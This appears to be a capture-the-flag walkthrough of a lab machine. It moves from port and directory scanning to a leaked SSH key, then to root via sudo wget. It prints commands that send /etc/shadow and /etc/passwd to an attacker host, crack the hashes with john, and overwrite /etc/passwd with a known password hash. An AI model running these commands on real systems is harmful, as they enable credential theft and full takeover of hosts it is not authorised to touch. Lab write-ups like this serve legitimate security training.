Room Link:
Scanning
Initial Scan
Kali
Scan all ports
No other ports found.
Kali
Copy nmap -sV -sT -O -p 1-65535 $VICTIM TCP/80 - HTTP
On the main page of the site it was just a apache default page but in the source we can see someone named jessie making a comment.
Ran gobuster and found a site under sitemap, nothing really interesting about it when browsing.
Kali
Copy gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt gobuster wasn't really able to find anything interesting.
Kali
Copy gobuster dir -u http://$VICTIM/sitemap/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt Ran dirb with defaults and it found a .ssh folder which has a id_rsa so I downloaded and used it.
Kali
Copy dirb http://$VICTIM/sitemap/
Kali
Copy chmod 600 id_rsa
ssh -v -i id_rsa jessie@$VICTIM Victim
I tried cracking jessies hash as I would then be able to run any command with sudo but I couldn't crack it, documenting it anyways.
Victim
Copy sudo -u root /usr/bin/wget --post-file=/etc/shadow $KALI:4444
sudo -u root /usr/bin/wget --post-file=/etc/passwd $KALI:4444 Victim
Victim
Copy unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Instead I changed the passwd file, I first downloaded to kali and changed the line for jessie so their password is now '123'. Then I uploaded it back and just became root.
Victim
Copy sudo -u root /usr/bin/wget --post-file=/etc/passwd 10.10.65.21:4444 Kali
Line to change
Copy jessie:$1$new$p7ptkEKU1HnaHpRtzNizS1:1000:1000:jessie,,,:/home/jessie:/bin/bash Kali
Copy python2 -m SimpleHTTPServer 81 Victim
Copy sudo wget http://$KALI:8/passwd -O /etc/passwd
sudo -i
